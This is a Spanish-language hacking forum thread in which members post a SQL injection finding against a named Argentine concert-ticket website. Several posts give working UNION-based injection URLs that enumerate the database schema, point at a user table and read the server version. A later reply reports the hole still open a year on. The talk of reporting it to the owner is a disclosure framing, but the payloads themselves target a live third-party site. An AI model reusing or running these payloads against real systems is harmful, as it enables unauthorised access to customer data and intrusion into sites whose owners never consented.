comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[ SQLi ] www.1000tickets.com.ar

  • 9 Respuestas
  • 3663 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado HATI

  • *
  • Moderador
  • Mensajes: 422
  • Actividad:
    1.67%
  • Reputación 11
    • Ver Perfil
« en: Febrero 21, 2016, 01:47:53 pm »
****************************************************
   SQLi No tienes permisos para ver links. Registrate o Entra con tu cuenta
****************************************************

> Site: No tienes permisos para ver links. Registrate o Entra con tu cuenta

> Descripción del site: venta de entradas para conciertos y demás.



> Descripción de la vulnerabilidad:

  -Se encuentra un síntoma de vulnerabilidad frente a SQLi.
 
  -Se halla el tipo de inyección y se comprueba manualmente y mediante SQLHelper





  -Tras esto se puede proceder a la búsqueda de información sensible, que puede ser utilizada con fines no éticos.

Tratandose de una página de venta de entradas, la información que contiene esta base de datos puede ser peligrosa si cae en malas manos.

Método manual:





Payload:
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
http://www.1000tickets.com.ar/ficha.php?id=7-1+UNION+SELECT+1,2,3,4,group_concat(column_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+information_schema.columns+where+table_name=char(116,98,108,95,117,115,117,97,114,105,111)--
Método automático con SQLHelper:



Vulnerabilidad reportada por la comunidad de Underc0de.

Autor: hati

« Última modificación: Marzo 07, 2016, 03:01:21 am por EPSILON »


Jugar o perder

Desconectado arthusu

  • *
  • Underc0der
  • Mensajes: 541
  • Actividad:
    10%
  • Reputación 2
  • Yo solo se que no se nada - Socrátes
    • Ver Perfil
    • Arthusu BLOG
  • Skype: arthusuxD
« Respuesta #1 en: Febrero 21, 2016, 03:10:53 pm »
Código: Text
  1. http://www.1000tickets.com.ar/ficha.php
  2. ?id=-91 union select 1,(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.columns)where table_schema!=0x696e666f726d6174696f6e5f736368656d61 and(@a)in (@a:=concat(@a,table_schema,0x203e20,table_name,0x3e,column_name,0x3c62723e))))a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 -- -

Desconectado EPSILON

  • *
  • Underc0der
  • Mensajes: 364
  • Actividad:
    0%
  • Reputación 0
  • epsilon@crypt.am
    • Ver Perfil
  • Skype: epsilon.root1
« Respuesta #2 en: Febrero 21, 2016, 03:34:37 pm »
@No tienes permisos para ver links. Registrate o Entra con tu cuenta a esto le falta el payload si no no cuenta para esta sección, te recomiendo que leas las No tienes permisos para ver links. Registrate o Entra con tu cuenta para poder postear aca los bugs que encuentres, y como concejo deja las tools automatizadas.

Código: Text
  1. http://www.1000tickets.com.ar/ficha.php?id=91+and+1=5+union+select+1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+--+

Saludos!, EPSILON
« Última modificación: Febrero 21, 2016, 03:36:18 pm por EPSILON »

Desconectado HATI

  • *
  • Moderador
  • Mensajes: 422
  • Actividad:
    1.67%
  • Reputación 11
    • Ver Perfil
« Respuesta #3 en: Febrero 21, 2016, 09:01:19 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
@No tienes permisos para ver links. Registrate o Entra con tu cuenta a esto le falta el payload si no no cuenta para esta sección, te recomiendo que leas las No tienes permisos para ver links. Registrate o Entra con tu cuenta para poder postear aca los bugs que encuentres, y como concejo deja las tools automatizadas.

Código: Text
  1. http://www.1000tickets.com.ar/ficha.php?id=91+and+1=5+union+select+1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+--+

Saludos!, EPSILON


Lo realicé de manera manual también, pero tienes razón en que debería haber puesto el payload, no me di cuenta, problema solucionado.
Gracias por avisar @No tienes permisos para ver links. Registrate o Entra con tu cuenta, ¿podría recibir ayuda para comunicar la vulnerabilidad?


Jugar o perder

Desconectado blackdrake

  • *
  • Co Admin
  • Mensajes: 1910
  • Actividad:
    20%
  • Reputación 15
    • Ver Perfil
« Respuesta #4 en: Febrero 22, 2016, 07:54:06 am »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
No tienes permisos para ver links. Registrate o Entra con tu cuenta
@No tienes permisos para ver links. Registrate o Entra con tu cuenta a esto le falta el payload si no no cuenta para esta sección, te recomiendo que leas las No tienes permisos para ver links. Registrate o Entra con tu cuenta para poder postear aca los bugs que encuentres, y como concejo deja las tools automatizadas.

Código: Text
  1. http://www.1000tickets.com.ar/ficha.php?id=91+and+1=5+union+select+1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+--+

Saludos!, EPSILON


Lo realicé de manera manual también, pero tienes razón en que debería haber puesto el payload, no me di cuenta, problema solucionado.
Gracias por avisar @No tienes permisos para ver links. Registrate o Entra con tu cuenta, ¿podría recibir ayuda para comunicar la vulnerabilidad?

Quieres reportarlo tu? o que lo haga la comunidad por ti?

Saludos.



Desconectado HATI

  • *
  • Moderador
  • Mensajes: 422
  • Actividad:
    1.67%
  • Reputación 11
    • Ver Perfil
« Respuesta #5 en: Febrero 22, 2016, 08:03:45 am »
Si es posible que la comunidad lo haga por mi lo agradecería @No tienes permisos para ver links. Registrate o Entra con tu cuenta, y también gracias a ti por responderme.


Jugar o perder

Desconectado blackdrake

  • *
  • Co Admin
  • Mensajes: 1910
  • Actividad:
    20%
  • Reputación 15
    • Ver Perfil
« Respuesta #6 en: Febrero 22, 2016, 09:47:26 am »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Si es posible que la comunidad lo haga por mi lo agradecería @No tienes permisos para ver links. Registrate o Entra con tu cuenta, y también gracias a ti por responderme.

Excelente, nos encargamos entonces! :D

Saludos.



Desconectado HATI

  • *
  • Moderador
  • Mensajes: 422
  • Actividad:
    1.67%
  • Reputación 11
    • Ver Perfil
« Respuesta #7 en: Febrero 22, 2016, 11:48:52 am »
@No tienes permisos para ver links. Registrate o Entra con tu cuenta gracias a ti a la comunidad de Underc0de


Jugar o perder

Conectado xyz

  • *
  • Moderador Global
  • Mensajes: 448
  • Actividad:
    21.67%
  • Reputación 10
    • Ver Perfil
    • Under0cde
« Respuesta #8 en: Febrero 20, 2017, 07:02:49 pm »
No se si revivir el post.

 La vulnerabilidad sigue activa.

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
http://www.1000tickets.com.ar/listado.php?idcat=1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19

Saludos.
« Última modificación: Febrero 20, 2017, 08:08:43 pm por xyz »

Desconectado blackdrake

  • *
  • Co Admin
  • Mensajes: 1910
  • Actividad:
    20%
  • Reputación 15
    • Ver Perfil
« Respuesta #9 en: Febrero 21, 2017, 01:35:03 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
No se si revivir el post.

 La vulnerabilidad sigue activa.

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
http://www.1000tickets.com.ar/listado.php?idcat=1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19

Saludos.

Si, nunca contestaron al correo y obviamente tampoco lo fixearon xD



 

¿Te gustó el post? COMPARTILO!



[SQLi] leong-leong.com

Iniciado por F0M3T

Respuestas: 0
Vistas: 781
Último mensaje Abril 10, 2013, 02:39:57 am
por F0M3T
SQLI Organo Profesional de los Ingenieros de Caminos Canales y Puertos

Iniciado por hdbreaker

Respuestas: 1
Vistas: 1076
Último mensaje Julio 25, 2013, 10:14:56 pm
por F0M3T
SQLI Double Error Based http://campusvirtual.frsf.utn.edu.ar

Iniciado por hdbreaker

Respuestas: 1
Vistas: 1038
Último mensaje Febrero 19, 2013, 06:59:26 pm
por ANTRAX
SQLI Bypass Admin.asp SocArgentina Investigacion Bioquimica e Ing Molecular

Iniciado por hdbreaker

Respuestas: 1
Vistas: 1192
Último mensaje Marzo 12, 2013, 12:46:44 pm
por Cronos
Agujero en servidores de BBDD [Hacking Google + SQLi] - www.kanglin.com.tw

Iniciado por baah

Respuestas: 5
Vistas: 1962
Último mensaje Junio 02, 2017, 06:39:33 am
por baah